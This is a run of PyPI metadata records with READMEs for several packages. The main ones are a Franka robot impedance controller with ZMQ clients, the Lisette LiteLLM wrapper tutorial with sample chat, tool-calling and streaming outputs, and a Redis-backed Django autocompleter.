      - id: dbt-autofix-fix  # Pass in multiple args
        args: [--semantic-layer, --include-packages, --behavior-change]
      # OR
      - id: dbt-autofix-fix  # Specify dbt project path
        args: [--path=jaffle-shop]
```
text/markdown
null
null
null
null
null
null
[]
[]
null
null
<3.14,>=3.10
[]
[]
[]
[ "click<9.0.0,>=8.2.0", "dbt-extractor<=0.6,>=0.5.0", "dbt-fusion-package-tools==0.20.0", "httpx>=0.27.0", "jinja2<4,>=3.1.3", "pyyaml>=6.0.2; python_version >= \"3.13\"", "pyyaml>=6.0; python_version < \"3.13\"", "rich>=13.7.0", "ruamel-yaml<0.18.15,>=0.18.10", "typer>=0.16.0", "yamllint>=1.37.0...
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:10:38.220107
dbt_autofix-0.20.0.tar.gz
250,484
30/e6/efa7241ca507fa86f1ec0bd6f61ed87644b19bd56301323d171b9b3c5d50/dbt_autofix-0.20.0.tar.gz
source
sdist
null
false
bb8b624762dd64f8358320cb53c97277
391d6e22995cf9a75ab0af1cb55a5b2940ecfbd56cc4f7b1a9cd983927ee120c
30e6efa7241ca507fa86f1ec0bd6f61ed87644b19bd56301323d171b9b3c5d50
null
[ "LICENSE" ]
722
2.4
bamboo-franka-client
0.1.0
Bamboo Franka Robot Control with Joint Impedance Control
# Bamboo Franka Controller

A lightweight package for controlling the Franka Emika FR3 and Panda with joint impedance control, and for controlling Robotiq grippers.

A single real-time controller machine runs the control node and maintains the real-time link with the FR3/Panda. Other machines can connect to this node using the Bamboo client via ZMQ to issue commands or receive robot state.

## Control Node Installation

Install the control node on the real-time control machine that is directly connected to the Franka robot.

### Prerequisites

1. Ensure that the [`libfranka` system requirements](https://github.com/frankarobotics/libfranka/tree/release-0.15.2?tab=readme-ov-file#1-system-requirements) are satisfied
2. Ensure that the [`libfranka` dependencies](https://github.com/frankarobotics/libfranka/tree/release-0.15.2?tab=readme-ov-file#1-system-requirements) are installed
3. **If using libfranka >= 0.14.0:** Install Pinocchio following the [libfranka dependency instructions](https://github.com/frankarobotics/libfranka/tree/release-0.15.2?tab=readme-ov-file#2-installing-dependencies) before running the installation script
4. Make sure you have set the inertial parameters for the Robotiq gripper in Franka Desk. You can follow the [instructions in DROID](https://droid-dataset.github.io/droid/software-setup/host-installation.html#updating-inertia-parameters-for-robotiq-gripper) for doing this.

### Build Controller

```bash
# Follow the instructions in the script
bash InstallBambooController
```

**Note:** This script builds `libfranka` locally and **will not override any system installations**.

The installation script may request sudo privileges to add user groups and install system packages. You will be prompted before any sudo commands are executed. You will also be prompted to enter the version of libfranka to install.
This can be determined by:

- Checking the FCI version in the Franka Desk (under Settings > Dashboard > Control) and then consulting the [FCI Compatibility Table](https://frankarobotics.github.io/docs/compatibility.html) for a compatible `libfranka` version
- Checking what libfranka versions you already have in other projects; for example, you could run:

```bash
locate libfranka.so
```

The `InstallBambooController` script will automatically handle:

- Adding your user to required groups (`realtime` for real-time kernel operations, `dialout` and `tty` for serial communication with Robotiq gripper)
- Installing system packages (`libzmq3-dev` for ZMQ networking, `libmsgpack-dev` for message serialization, `libpoco-dev` for Franka dependencies)
- Cloning and building `libfranka`

**Important:** If groups are added during installation, **you must log out and log back in** before running the controller.

### Manual Installation

If you prefer to install manually, refer to the steps in the [`InstallBambooController`](InstallBambooController) script.

## Bamboo Client Installation

You should install the Bamboo client on any machine that will talk to the control node. This installation only includes the client dependencies (numpy, pyzmq, msgpack) and not the hardware control dependencies.

**Install from PyPI:**

```bash
pip install bamboo-franka-client
```

**Install from GitHub repository:**

```bash
pip install git+https://github.com/chsahit/bamboo.git
```

**Install from source:**

```bash
git clone https://github.com/chsahit/bamboo.git
cd bamboo
pip install -e .
```

**If you need Robotiq gripper server dependencies** (pyserial, pymodbus) on a non-control node machine:

```bash
pip install -e .[server]
```

## Usage

### Server-Side Robot Control

**Security Warning:** By default, the controller listens on all network interfaces (`*` or `0.0.0.0`), accepting commands from any IP address that can reach the machine. For security, consider restricting access by setting the listen address using the `--listen_ip` flag in `RunBambooController` (or the equivalent configuration option): for example, use `127.0.0.1` to accept commands only from the local machine, or a specific interface address such as `192.168.1.10` to accept commands only from that network. Avoid using `*`/`0.0.0.0` on untrusted or publicly accessible networks unless you have additional protections in place (VPN, firewall, etc.).

**Easy Start (Recommended):**

Use the provided script to start both control node and gripper server in tmux:

```bash
bash RunBambooController
```

The script supports configuration flags:

```bash
bash RunBambooController start --robot_ip 172.16.0.2 --control_port 5555 --listen_ip "*" --gripper_device /dev/ttyUSB0 --gripper_port 5559 --conda_env bamboo
```

Available options:

- `--robot_ip`: Robot IP address (default: 172.16.0.2)
- `--control_port`: Control node ZMQ port (default: 5555)
- `--listen_ip`: ZMQ server listen address (default: * for all interfaces)
- `--gripper_device`: Gripper device (default: /dev/ttyUSB0)
- `--gripper_port`: Gripper server ZMQ port (default: 5559)
- `--conda_env`: Conda environment name (default: bamboo)

Other commands:

- `bash RunBambooController status` - Check server status
- `bash RunBambooController stop` - Stop all servers
- `bash RunBambooController attach` - Attach to tmux session

**Manual Start:**

If you need to run servers manually, first run the C++ control node:

```bash
cd controller/build
./bamboo_control_node -r <robot-ip> -p <zmq-port> [-l <listen-address>] [-m]
```

Available flags:

- `-r`: Robot IP address (required)
- `-p`: Port number (required)
- `-l`: Listen address (default: * for all interfaces)
- `-m`: Use min-jerk interpolation (default: linear)
- `-h`: Show help

Example:

```bash
./bamboo_control_node -r 172.16.0.2 -p 5555 -l "*"
```

Then in a new terminal, launch the Robotiq gripper server:

```bash
conda activate bamboo
cd controller
python gripper_server.py --gripper-port <gripper-device> --zmq-port <zmq-port>
```

Example:

```bash
python gripper_server.py --gripper-port /dev/ttyUSB0 --zmq-port 5559
```

### Client-Side Interface with Robot and Gripper

You can verify the install by running some of the example scripts in a new terminal.

To actuate the robot and print out its joint angles (*WARNING: THIS SCRIPT MOVES THE ROBOT WITHOUT DOING COLLISION CHECKING SO MAKE SURE THE NEARBY WORKSPACE IS CLEAR*):

```bash
conda activate bamboo
python -m bamboo.examples.joint_trajectory
```

To open and close the gripper and print the width of the fingers:

```bash
conda activate bamboo
python -m bamboo.examples.gripper
```

## Development Setup

If you plan to contribute to Bamboo, you'll need to set up the development tools.

### Install Development Dependencies

Install the development dependencies including pre-commit, ruff, and mypy:

```bash
pip install -e .[dev]
```

### Set Up Pre-Commit Hooks

Install the pre-commit hooks to automatically run linting and formatting checks before each commit:

```bash
pre-commit install
```

Now, whenever you commit code, pre-commit will automatically:

- Format Python code with ruff
- Check Python code style with ruff

### Run Pre-Commit Manually

To run all pre-commit hooks on all files without making a commit:

```bash
pre-commit run --all-files
```

To run pre-commit on specific files:

```bash
pre-commit run --files path/to/file.py
```

## Contributing

For Python code, we enforce style with `ruff` and type checking with `mypy`. For C++ code, we enforce style with `clang-format`. Pre-commit hooks will automatically run linting and formatting checks when you make a commit. You can also run them manually with `pre-commit run --all-files`.

To contribute:

1. Fork the repository
2. Create a feature branch based on `main`
3. Install development dependencies: `pip install -e .[dev]`
4. Set up pre-commit hooks: `pre-commit install`
5. Make your changes and commit them
6. Open a pull request from your feature branch

## Acknowledgements

This work draws heavily from [deoxys\_control](https://github.com/UT-Austin-RPL/deoxys_control) and [drake-franka-driver](https://github.com/RobotLocomotion/drake-franka-driver). Thanks to the developers for their open-source code!
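The control node's `-m` flag mentioned above selects min-jerk interpolation instead of the default linear interpolation. For reference, min-jerk trajectories follow the classic quintic time-scaling s(τ) = 10τ³ − 15τ⁴ + 6τ⁵, which gives zero velocity and acceleration at both endpoints. A small sketch of interpolating a single joint position this way — purely illustrative, not the controller's actual C++ code:

```python
def min_jerk(q0: float, q1: float, t: float, duration: float) -> float:
    """Interpolate from q0 to q1 over `duration` seconds using the
    minimum-jerk polynomial 10*tau**3 - 15*tau**4 + 6*tau**5, which
    starts and ends with zero velocity and zero acceleration."""
    tau = min(max(t / duration, 0.0), 1.0)  # clamp normalized time to [0, 1]
    s = 10 * tau**3 - 15 * tau**4 + 6 * tau**5
    return q0 + (q1 - q0) * s

# By symmetry, the trajectory passes through the midpoint at half the duration.
print(min_jerk(0.0, 1.0, 0.5, 1.0))  # → 0.5
```

Compared to linear interpolation, this smooth profile avoids the velocity discontinuities at waypoint boundaries that can trigger the robot's acceleration limits.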
text/markdown
Bamboo Development Team
null
null
null
null
robotics, franka, control, impedance, robot
[ "Development Status :: 4 - Beta", "Intended Audience :: Science/Research", "Operating System :: POSIX :: Linux", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: P...
[]
null
null
>=3.8
[]
[]
[]
[ "msgpack", "numpy>=1.20.0", "pyzmq>=22.0.0", "pyserial>=3.4; extra == \"server\"", "pymodbus==2.5.3; extra == \"server\"", "pre-commit>=3.0.0; extra == \"dev\"", "ruff>=0.6.0; extra == \"dev\"", "mypy>=1.0.0; extra == \"dev\"", "build; extra == \"dev\"", "twine; extra == \"dev\"" ]
[]
[]
[]
[ "Homepage, https://github.com/chsahit/bamboo", "Repository, https://github.com/chsahit/bamboo", "Issues, https://github.com/chsahit/bamboo/issues" ]
twine/6.2.0 CPython/3.10.19
2026-02-19T22:10:35.696219
bamboo_franka_client-0.1.0.tar.gz
16,257
dd/d3/7056fb10ea6dec6463e60e709254ceb07aa0683d28ba4c365ce75319b39d/bamboo_franka_client-0.1.0.tar.gz
source
sdist
null
false
84ffc0768c0a4af2d7579a402301ac26
e0ba8af2dc2e8627935359591269e38731f5f09aa94bf1af743b638df45c2b30
ddd37056fb10ea6dec6463e60e709254ceb07aa0683d28ba4c365ce75319b39d
MIT
[ "LICENSE" ]
237
2.4
lisette
0.0.38
litellm helper
# Lisette

<!-- WARNING: THIS FILE WAS AUTOGENERATED! DO NOT EDIT! -->

> **NB**: If you are reading this in GitHub’s readme, we recommend you
> instead read the much more nicely formatted [documentation
> format](https://lisette.answer.ai/) of this tutorial.

*Lisette* is a wrapper for the [LiteLLM Python SDK](https://docs.litellm.ai/), which provides unified access to 100+ LLM providers using the OpenAI API format. LiteLLM provides a unified interface to access multiple LLMs, but it’s quite low level: it leaves the developer to do a lot of stuff manually. Lisette automates pretty much everything that can be automated, whilst providing full control. Amongst the features provided:

- A [`Chat`](https://lisette.answer.ai/core.html#chat) class that creates stateful dialogs across any LiteLLM-supported model
- Convenient message creation utilities for text, images, and mixed content
- Simple and convenient support for tool calling with automatic execution
- Built-in support for web search capabilities (including citations for supporting models)
- Streaming responses with formatting
- Full async support with [`AsyncChat`](https://lisette.answer.ai/core.html#asyncchat)
- Prompt caching (for supporting models)

To use Lisette, you’ll need to set the appropriate API keys as environment variables for whichever LLM providers you want to use.

## Get started

LiteLLM will automatically be installed with Lisette, if you don’t already have it.

``` python
!pip install lisette -qq
```

Lisette only exports the symbols that are needed to use the library, so you can use import \* to import them.
Here’s a quick example showing how easy it is to switch between different LLM providers: ``` python from lisette import * ``` ## Chat ``` python models = ['claude-sonnet-4-20250514', 'gemini/gemini-2.5-flash', 'openai/gpt-4o'] for model in models: chat = Chat(model) res = chat("Please tell me about yourself in one brief sentence.") display(res) ``` I’m Claude, an AI assistant created by Anthropic to be helpful, harmless, and honest in conversations and tasks. <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=29, prompt_tokens=17, total_tokens=46, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> I am a large language model, trained by Google, designed to assist with information and generate text. <details> - id: `chatcmpl-xxx` - model: `gemini-2.5-flash` - finish_reason: `stop` - usage: `Usage(completion_tokens=603, prompt_tokens=11, total_tokens=614, completion_tokens_details=CompletionTokensDetailsWrapper(accepted_prediction_tokens=None, audio_tokens=None, reasoning_tokens=583, rejected_prediction_tokens=None, text_tokens=20), prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=None, text_tokens=11, image_tokens=None))` </details> I’m an AI language model created by OpenAI, designed to assist with a wide range of questions and tasks by providing information and generating text-based responses. 
<details> - id: `chatcmpl-xxx` - model: `gpt-4o-2024-08-06` - finish_reason: `stop` - usage: `Usage(completion_tokens=30, prompt_tokens=17, total_tokens=47, completion_tokens_details=CompletionTokensDetailsWrapper(accepted_prediction_tokens=0, audio_tokens=0, reasoning_tokens=0, rejected_prediction_tokens=0, text_tokens=None), prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=0, cached_tokens=0, text_tokens=None, image_tokens=None))` </details> That’s it! Lisette handles all the provider-specific details automatically. Each model will respond in its own style, but the interface remains the same. ## Message formatting ### Multiple messages Lisette accepts multiple messages in one go: ``` python chat = Chat(models[0]) res = chat(['Hi! My favorite drink is coffee.', 'Hello!', 'Whats my favorite drink?']) display(res) ``` Hello! Based on what you just told me, your favorite drink is coffee! ☕ <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=22, prompt_tokens=23, total_tokens=45, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> If you have a pre-existing message history, you can also pass it when you create the [`Chat`](https://lisette.answer.ai/core.html#chat) object: ``` python chat = Chat(models[0],hist=['Hi! My favorite drink is coffee.', 'Hello!']) res = chat('Whats my favorite drink?') display(res) ``` Your favorite drink is coffee! You just mentioned that in your previous message.
<details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=18, prompt_tokens=30, total_tokens=48, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> ### Images Lisette also makes it easy to include images in your prompts: ``` python from pathlib import Path from IPython.display import Image ``` ``` python fn = Path('samples/puppy.jpg') img = fn.read_bytes() Image(img) ``` ![](index_files/figure-commonmark/cell-8-output-1.jpeg) All you have to do is read it in as bytes: ``` python img[:20] ``` b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00' And you can pass it inside a [`Chat`](https://lisette.answer.ai/core.html#chat) object: ``` python chat = Chat(models[0]) chat([img, "What's in this image? Be brief."]) ``` A cute puppy with brown and white fur lying on grass next to purple flowers. <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=20, prompt_tokens=108, total_tokens=128, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> ### Prefill Some providers (e.g. Anthropic) support `prefill`, allowing you to specify how the assistant’s response should begin: ``` python chat = Chat(models[0]) chat("Concisely, what's the meaning of life?", prefill="According to Douglas Adams,") ``` According to Douglas Adams,it’s 42. More seriously, there’s no universal answer.
Common perspectives include: - Creating meaning through relationships, growth, and contribution - Fulfilling a divine purpose or spiritual calling - Maximizing well-being and minimizing suffering - Leaving a positive legacy - Simply experiencing and appreciating existence itself The meaning might be something you create rather than discover. <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=84, prompt_tokens=24, total_tokens=108, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> ## Tools Lisette makes it easy to give LLMs access to Python functions. Just define a function with type hints and a docstring: ``` python def add_numbers( a: int, # First number to add b: int # Second number to add ) -> int: "Add two numbers together" return a + b ``` Now pass the function to [`Chat`](https://lisette.answer.ai/core.html#chat) and the model can use it automatically: ``` python chat = Chat(models[0], tools=[add_numbers]) res = chat("What's 47 + 23? Use the tool.") res ``` The result of 47 + 23 is 70. <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=18, prompt_tokens=573, total_tokens=591, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> If you want to see all intermediate messages and outputs you can use the `return_all=True` feature. ``` python chat = Chat(models[0], tools=[add_numbers]) res = chat("What's 47 + 23 + 59? Use the tool.",max_steps=3,return_all=True) display(*res) ``` I’ll help you calculate 47 + 23 + 59 using the add_numbers tool. 
Since the tool can only add two numbers at a time, I’ll need to do this in two steps. 🔧 add_numbers({“a”: 47, “b”: 23}) <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `tool_calls` - usage: `Usage(completion_tokens=116, prompt_tokens=433, total_tokens=549, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> {'tool_call_id': 'toolu_01F9oakoP8ANHkTMD1DyQDi7', 'role': 'tool', 'name': 'add_numbers', 'content': '70'} Now I’ll add the result (70) to the third number (59): 🔧 add_numbers({“a”: 70, “b”: 59}) <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `tool_calls` - usage: `Usage(completion_tokens=87, prompt_tokens=562, total_tokens=649, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> {'tool_call_id': 'toolu_01Cdf3FHJdbx64F8H8ooE1Db', 'role': 'tool', 'name': 'add_numbers', 'content': '129'} The answer is **129**. I calculated this by first adding 47 + 23 = 70, then adding 70 + 59 = 129. <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=41, prompt_tokens=702, total_tokens=743, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> It shows the intermediate tool calls, and the tool results! ## Web search Some models support web search capabilities. 
Lisette makes this easy to use: ``` python chat = Chat(models[0], search='l') # 'l'ow, 'm'edium, or 'h'igh search context res = chat("Please tell me one fun fact about otters. Keep it brief") res ``` Here’s a fun fact about otters: Sea otters allow themselves to get entangled in kelp forests - this creates a tether so they don’t drift away on sleep currents as they sleep. They essentially use kelp as a natural anchor to stay in place while floating and resting on the water’s surface! <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=143, prompt_tokens=15626, total_tokens=15769, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), server_tool_use=ServerToolUse(web_search_requests=1), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> > [!TIP] > > Some providers (like Anthropic) provide citations for their search > results. ``` python res.choices[0].message.provider_specific_fields ``` {'citations': [[{'type': 'web_search_result_location', 'cited_text': 'Sea Otters allow themselves to get entangled in kelp forests this creates a tether so they don’t drift away on sleep currents as they sleep. 
', 'url': 'https://www.mygreenworld.org/blog/facts-about-otters', 'title': 'Five Fast Facts about Otters — My Green World', 'encrypted_index': 'EpABCioIBxgCIiQ4ODk4YTFkYy0yMTNkLTRhNmYtOTljYi03ZTBlNTUzZDc0NWISDCMi/kxdYrQXVUX+ZxoMVvW3BHE29cyMhwAFIjBZEBw3PaH+XAslsXWMNucD7FqSwe5Fnnsfh2RzTX9x/q9XQ1Mm1Ke6JOreehNzVI0qFDkJYT4NCX8U4CjHHwoyLKtY66vhGAQ='}]], 'thinking_blocks': None} ## Streaming For real-time responses, use `stream=True` to get chunks as they’re generated rather than waiting for the complete response: ``` python chat = Chat(models[0]) res_gen = chat("Concisely, what are the top 10 biggest animals?", stream=True) res_gen ``` <generator object Chat._call> ``` python from litellm import ModelResponse, ModelResponseStream ``` You can loop over the generator to get the partial responses: ``` python for chunk in res_gen: if isinstance(chunk,ModelResponseStream): print(chunk.choices[0].delta.content,end='') ``` Here are the top 10 biggest animals by size/weight: 1. **Blue whale** - largest animal ever, up to 100 feet long 2. **Fin whale** - second-largest whale, up to 85 feet 3. **Bowhead whale** - up to 65 feet, very heavy build 4. **Right whale** - up to 60 feet, extremely bulky 5. **Sperm whale** - up to 67 feet, largest toothed whale 6. **Gray whale** - up to 50 feet 7. **Humpback whale** - up to 52 feet 8. **African elephant** - largest land animal, up to 13 feet tall 9. **Colossal squid** - up to 46 feet long (largest invertebrate) 10. **Giraffe** - tallest animal, up to 18 feet tall *Note: Various whale species dominate due to the ocean's ability to support massive body sizes.*None And the final chunk is the complete `ModelResponse`: ``` python chunk ``` Here are the top 10 biggest animals by size/weight: 1. **Blue whale** - largest animal ever, up to 100 feet long 2. **Fin whale** - second-largest whale, up to 85 feet 3. **Bowhead whale** - up to 65 feet, very heavy build 4. **Right whale** - up to 60 feet, extremely bulky 5. 
**Sperm whale** - up to 67 feet, largest toothed whale 6. **Gray whale** - up to 50 feet 7. **Humpback whale** - up to 52 feet 8. **African elephant** - largest land animal, up to 13 feet tall 9. **Colossal squid** - up to 46 feet long (largest invertebrate) 10. **Giraffe** - tallest animal, up to 18 feet tall *Note: Various whale species dominate due to the ocean’s ability to support massive body sizes.* <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=233, prompt_tokens=22, total_tokens=255, completion_tokens_details=CompletionTokensDetailsWrapper(accepted_prediction_tokens=None, audio_tokens=None, reasoning_tokens=0, rejected_prediction_tokens=None, text_tokens=None), prompt_tokens_details=None)` </details> ## Async For web applications and concurrent operations, like in [FastHTML](https://fastht.ml), we recommend using [`AsyncChat`](https://lisette.answer.ai/core.html#asyncchat): ``` python chat = AsyncChat(models[0]) await chat("Hi there") ``` Hello! How are you doing today? Is there anything I can help you with? <details> - id: `chatcmpl-xxx` - model: `claude-sonnet-4-20250514` - finish_reason: `stop` - usage: `Usage(completion_tokens=20, prompt_tokens=9, total_tokens=29, completion_tokens_details=None, prompt_tokens_details=PromptTokensDetailsWrapper(audio_tokens=None, cached_tokens=0, text_tokens=None, image_tokens=None), cache_creation_input_tokens=0, cache_read_input_tokens=0)` </details> To wrap up, we’ll show an example of async + streaming + toolcalling + search: ``` python chat = AsyncChat(models[0], search='l', tools=[add_numbers]) res = await chat("""\ Search the web for the avg weight, in kgs, of male African and Asian elephants. Then add the two. Keep your replies ultra concise! Dont search the web more than once please. """, max_steps=4, stream=True) await adisplay_stream(res) # this is a convenience function to make async streaming look great in notebooks! 
``` Based on the search results: **Male African elephants**: [\*](https://www.africa-safaris.com/How-Much-Does-An-Elephant-Weigh "How Much Does An Elephant Weigh") [\*](https://www.quora.com/What-is-the-average-weight-of-an-adult-African-elephant-in-pounds-and-tons "What is the average weight of an adult African elephant in pounds and tons? - Quora") Average weight is 5,000 kg (11,000 pounds) **Male Asian elephants**: [\*](https://www.ifaw.org/international/journal/difference-african-asian-elephants "African Elephants vs. Asian Elephants | IFAW") [\*](https://www.ifaw.org/international/journal/difference-african-asian-elephants "African Elephants vs. Asian Elephants | IFAW") Average weight is 3,600 kg (7,900 pounds) <details class="tool-usage-details"> `add_numbers({"a": 5000, "b": 3600})` - `8600` </details> **Total**: 8,600 kg ## Next steps Ready to dive deeper? - Check out the rest of the [documentation](https://lisette.answer.ai/core.html). - Visit the [GitHub repository](https://github.com/answerdotai/lisette) to contribute or report issues. - Join our [Discord community](https://discord.gg/y7cDEX7r)!
text/markdown
null
AnswerDotAI <support@answer.ai>
null
null
Apache-2.0
nbdev, jupyter, notebook, python
[ "Natural Language :: English", "Intended Audience :: Developers", "Development Status :: 3 - Alpha", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only" ]
[]
null
null
>=3.9
[]
[]
[]
[ "litellm", "numpydoc", "toolslm>=0.3.29", "fastcore>=1.9.2", "ipython; extra == \"dev\"", "pycachy>=0.0.6; extra == \"dev\"", "fastlite; extra == \"dev\"", "nbdev; extra == \"dev\"", "pillow; extra == \"dev\"" ]
[]
[]
[]
[ "Repository, https://github.com/AnswerDotAI/lisette", "Documentation, https://lisette.answer.ai/" ]
twine/6.2.0 CPython/3.12.0
2026-02-19T22:10:18.932539
lisette-0.0.38.tar.gz
28,641
64/c4/f9bb7d4f05efb503e81a12461c52bfeb167ef4d2e46da0e7bba8c6491e89/lisette-0.0.38.tar.gz
source
sdist
null
false
e5e596240251fe8593a97725de1ffe45
45da1ee9334643490a7e3196695905f6e0712a539735dd49983f24546103b8d4
64c4f9bb7d4f05efb503e81a12461c52bfeb167ef4d2e46da0e7bba8c6491e89
null
[ "LICENSE" ]
427
2.4
django-redis-autocompleter
1.1.4
A redis-backed autocompleter for Django projects.
&nbsp; [![PyPI](https://img.shields.io/pypi/v/django-redis-autocompleter)](https://pypi.org/project/django-redis-autocompleter/) [![Test Suite](https://github.com/ycharts/django-autocompleter/actions/workflows/main.yml/badge.svg?branch=master)](https://github.com/ycharts/django-autocompleter/actions/workflows/main.yml) [![Coverage Status](https://coveralls.io/repos/github/ycharts/django-autocompleter/badge.svg?branch=master)](https://coveralls.io/github/ycharts/django-autocompleter?branch=master) django-redis-autocompleter is a redis-backed autocompleter for Django. It provides fast, seamless autocompletion for Django models with a minimum of effort. ## Contributors ✨ Thanks goes to these wonderful people. <!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section --> <!-- prettier-ignore-start --> <!-- markdownlint-disable --> <table> <tr> <td align="center"><img src="https://avatars.githubusercontent.com/u/83293?v=4" width="100px;" alt="Ara Anjargolian"/><br /><sub><b><a href="https://github.com/ara818">@ara818</a></b></sub></td> <td align="center"><img src="https://avatars.githubusercontent.com/u/2000316?v=4" width="100px;" alt="Kevin Fox"/><br /><sub><b><a href="https://github.com/KFoxder">@kfoxder</a></b></sub></td> <td align="center"><img src="https://avatars.githubusercontent.com/u/3022071?v=4" width="100px;" alt="Tom Jakeway"/><br /><sub><b><a href="https://github.com/Jakeway">@jakeway</a></b></sub></td> </tr> </table> <!-- markdownlint-enable --> <!-- prettier-ignore-end --> <!-- ALL-CONTRIBUTORS-LIST:END -->
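The core trick behind a redis-backed autocompleter is pre-indexing every prefix of each term so that lookups are a single key fetch. A minimal in-memory sketch of that general technique (this illustrates the idea only; it does not use this package's actual API, and the real library stores these prefix mappings in Redis):

``` python
# In-memory sketch of prefix indexing, the pattern redis-backed
# autocompleters use (the real package keeps these mappings in Redis).
from collections import defaultdict

index = defaultdict(set)

def add_term(term: str) -> None:
    norm = term.lower()
    for i in range(1, len(norm) + 1):  # index every prefix of the term
        index[norm[:i]].add(term)

def suggest(prefix: str) -> list:
    # A lookup is a single key fetch, then a sort for stable output.
    return sorted(index.get(prefix.lower(), set()))

for name in ["Apple", "Amazon", "Alphabet"]:
    add_term(name)

print(suggest("a"))   # ['Alphabet', 'Amazon', 'Apple']
print(suggest("ap"))  # ['Apple']
```

Trading write-time work (one index entry per prefix) for constant-time reads is what makes this pattern a good fit for a key-value store like Redis.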
text/markdown
null
Ara Anjargolian <ara818@gmail.com>, Kevin Fox <kevin_fox@me.com>
null
null
null
autocompleter, django
[ "Programming Language :: Python :: 3", "Environment :: Web Environment", "Intended Audience :: Developers", "Operating System :: OS Independent", "Framework :: Django" ]
[]
null
null
>=3.7
[]
[]
[]
[ "Django<6.0,>=3.2.0", "hiredis>=1", "redis>=3" ]
[]
[]
[]
[ "Homepage, https://github.com/ycharts/django-autocompleter", "Bug Tracker, https://github.com/ycharts/django-autocompleter/issues" ]
twine/6.2.0 CPython/3.14.2
2026-02-19T22:10:17.888683
django_redis_autocompleter-1.1.4.tar.gz
22,984
2c/4e/8ffad8ea4baddf1105b814f052a26c3ec7841d58fecee49ee5749f554d33/django_redis_autocompleter-1.1.4.tar.gz
source
sdist
null
false
ebe2b7ba962ea690d49da8d3fd7a3de3
b73c0b2dacfa60b5414ba2733b6c2b74464d31d5b76a60380140f14afc8cc740
2c4e8ffad8ea4baddf1105b814f052a26c3ec7841d58fecee49ee5749f554d33
null
[]
223
2.4
llm-blanket
0.1.1
Unified Python library for LLM APIs (OpenAI, Anthropic, Gemini, xAI, Groq, custom)
# llm-blanket Unified Python library for LLM APIs: **OpenAI**, **Anthropic**, **Gemini**, **xAI (Grok)**, **Groq**, and **custom OpenAI-compatible** endpoints. - Single interface: specify a model, get an LLM instance, call `invoke(messages)`. - Provider inferred from model name (e.g. `gpt-4o` → OpenAI, `claude-3-5-sonnet` → Anthropic) or set explicitly. - Base URL overrides via config or `base_url` / `base_urls` for custom or proxy endpoints. - API keys from environment (LangChain/AutoGen-style) or passed in config. ## Install ```bash pip install llm-blanket ``` Optional provider dependencies (install only what you use): ```bash pip install "llm-blanket[openai]" # OpenAI + Groq + xAI + custom (OpenAI-compatible) pip install "llm-blanket[anthropic]" # Anthropic Claude pip install "llm-blanket[gemini]" # Google Gemini pip install "llm-blanket[all]" # All providers ``` ## Examples Runnable scripts are in the [examples/](examples/) directory: - **[examples/quickstart.py](examples/quickstart.py)** – create an LLM and call `invoke()` with a user message. - **[examples/streaming.py](examples/streaming.py)** – stream tokens with `invoke_stream()`. - 